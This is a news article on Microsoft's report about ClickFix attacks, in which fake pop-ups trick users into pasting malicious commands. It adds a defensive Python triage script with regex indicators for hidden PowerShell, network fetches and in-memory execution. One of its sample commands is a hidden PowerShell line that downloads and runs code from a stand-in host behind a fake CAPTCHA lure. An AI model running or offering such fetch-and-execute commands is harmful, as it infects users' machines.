JAKARTA - Microsoft has again warned about cyberattacks that are increasing rapidly around the world. In its latest report, the Digital Defense Report 2025, the Redmond-based technology company revealed a major spike in ClickFix-based attacks, a social engineering tactic that leads users to unknowingly infect their own devices with malware.
According to the report, ClickFix is now one of the most common methods hackers use to gain initial access to a target system. The technique does not exploit the system; instead, it persuades victims to take actions that seem legitimate but are actually dangerous.
ClickFix attacks usually appear as fake pop-ups, technical support messages, or convincing system alerts. The message often asks users to copy and paste certain code into the Windows 'Run' box or a terminal, on the pretext of fixing a system error.
However, once the code is executed, the malware is immediately downloaded and injected into the device's memory rather than written to the file system. This makes traces of the attack difficult to detect because no suspicious files are left in storage.
Microsoft notes that since early 2024 the number of ClickFix attacks has increased sharply, and the technique has been used in various large-scale fraud campaigns. One example is the phishing incidents that mimicked the Booking.com site in 2024, in which victims received fake travel confirmation emails that directed them to a mock site complete with a fake CAPTCHA.
Even more striking, Microsoft Defender Experts found that 47% of all initial access incidents last year came from ClickFix attacks. This figure shows how effective this social engineering method is at trapping unsuspecting users.
What makes ClickFix very dangerous is the fact that users themselves executed the malicious code, without realizing they were opening the door to malware, Microsoft wrote in its report.
Microsoft emphasizes that behavioral education and awareness are the most effective defense against this kind of attack. Because ClickFix relies on user action, no single technical solution can prevent it completely.
Some of the suggested preventive measures include:
Never copy or run code from an unverified source, even if it looks official.
Enable PowerShell logging to record all activities performed through the terminal.
Monitor clipboard-to-terminal activity in order to detect potentially malicious commands copied from outside.
Implement a browser hardening policy to block the execution of malicious scripts on websites.
Avoid downloading apps from third parties, unless absolutely necessary and officially sourced.
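To illustrate the logging and monitoring measures above, the following added example (not taken from Microsoft's report) scores command strings such as those recovered from PowerShell logs or from the Windows Run history key `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`. The indicator patterns, weights, threshold and sample commands are assumptions constructed for illustration.

```python
import re

# (name, weight, pattern). Patterns and weights are illustrative assumptions,
# not values published by Microsoft.
INDICATORS = [
    ("script_host", 1, re.compile(r"\b(powershell|pwsh|mshta|cmd|wscript|cscript)(\.exe)?\b", re.I)),
    ("hidden_window", 2, re.compile(r"(?<!\S)-w(indowstyle)?\s+hidden\b", re.I)),
    ("encoded_command", 2, re.compile(r"(?<!\S)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I)),
    ("network_fetch", 2, re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|curl|downloadstring)\b|https?://", re.I)),
    ("in_memory_exec", 3, re.compile(r"\b(iex|invoke-expression)\b", re.I)),
    # Lure text appended as a comment so the Run box appears to show a CAPTCHA step.
    ("fake_verification_lure", 2, re.compile(r"not a robot|captcha|verif(y|ication)", re.I)),
]

def clean(command):
    """RunMRU registry values carry a trailing '\\1' marker; drop it."""
    return command[:-2] if command.endswith("\\1") else command

def score_command(command):
    """Return (total score, names of matched indicators) for one command."""
    text = clean(command)
    hits = [(name, weight) for name, weight, rx in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), [n for n, _ in hits]

def triage(commands, threshold=5):
    """Return (command, score, indicators) for commands at or above threshold."""
    flagged = []
    for command in commands:
        score, names = score_command(command)
        if score >= threshold:
            flagged.append((clean(command), score, names))
    return flagged

# Constructed sample Run-dialog history entries (not real indicators).
SAMPLES = [
    "notepad\\1",
    "cmd /c ipconfig /all\\1",
    "powershell -NoProfile -File C:\\Scripts\\backup.ps1\\1",
    'powershell -w hidden -c "iex (irm https://clickfix-test.example.invalid/a)"'
    " # I am not a robot: CAPTCHA ID 4821\\1",
]

if __name__ == "__main__":
    for cmd, score, names in triage(SAMPLES):
        print(score, names, cmd)
```

A single indicator, such as a script host on its own, stays below the threshold, so routine administrative commands are not flagged; the combination of hidden window, network fetch and in-memory execution is what raises the score.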
Microsoft insists that in cases like ClickFix, user caution and vigilance are the only real safeguards.
With hackers using increasingly sophisticated social manipulation techniques, this report is an important reminder for organizations and individuals to be more careful in responding to system messages or warnings that appear on the screen.
"ClickFix shows that modern cyber threats depend not only on technological weaknesses, but also on human weaknesses," Microsoft wrote in closing its report.